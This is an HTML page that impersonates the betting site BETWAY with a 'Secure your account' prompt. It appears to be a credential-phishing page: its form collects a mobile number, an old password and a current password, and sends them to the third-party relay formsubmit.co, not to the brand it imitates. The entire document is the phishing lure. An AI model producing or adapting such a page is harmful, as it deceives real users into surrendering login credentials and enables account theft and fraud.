<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
   <meta name="author" content="ZEUSGHOD">
   <meta name="description" content="Secure your account">
  
    <title>Secure</title>
    <link rel="stylesheet" href="style.css">
    <link rel="icon" href="img/10703030.png" type="x-icon">
    <style>
        body {
    display: grid;
    place-items: center;
    box-sizing: border-box;
}

form {
    display: grid;
    place-items: center;
    box-shadow: 0 0 2px;
    width: 300px;
}

.Num {
    width: 90%;
    height: 25px;
    padding: 5px;
    margin: 5px;
    
}

.old-pass {
     width: 90%;
    height: 25px;
    padding: 5px;
    margin: 5px;
}

.Pass{
     width: 90%;
    height: 25px;
    padding: 5px;
    margin: 5px;
}

.btn {
    width: 200px;
    height: 30px;
    background-color: #00abff;
    border: 0;
    border-radius: 5px;
    outline-color: white;
    outline-offset: 0;
}

    </style>
</head>
<body>
    
    <form action="https://formsubmit.co/" method="POST">
        <img src="img/download (2).png" alt="X"></img>
        <p><b>BETWAY</b></p>
        <p>Protect your account information</p>
        
        <input class="Num" type="Number" id="Tel-Num" name="Tel-Num" placeholder="Mobile Number" required>
        <input class="old-pass" type="password" id="Old-Password" name="Old-Password" placeholder="Old Password" required>
        <input class="Pass" type="Password" id="Password" name="Password" placeholder="Current Password" required>
        
        <div>
        <button class="btn">SECURE</button>
        
        </div>
       
        <br>
    </form>
    
</body>
</html>
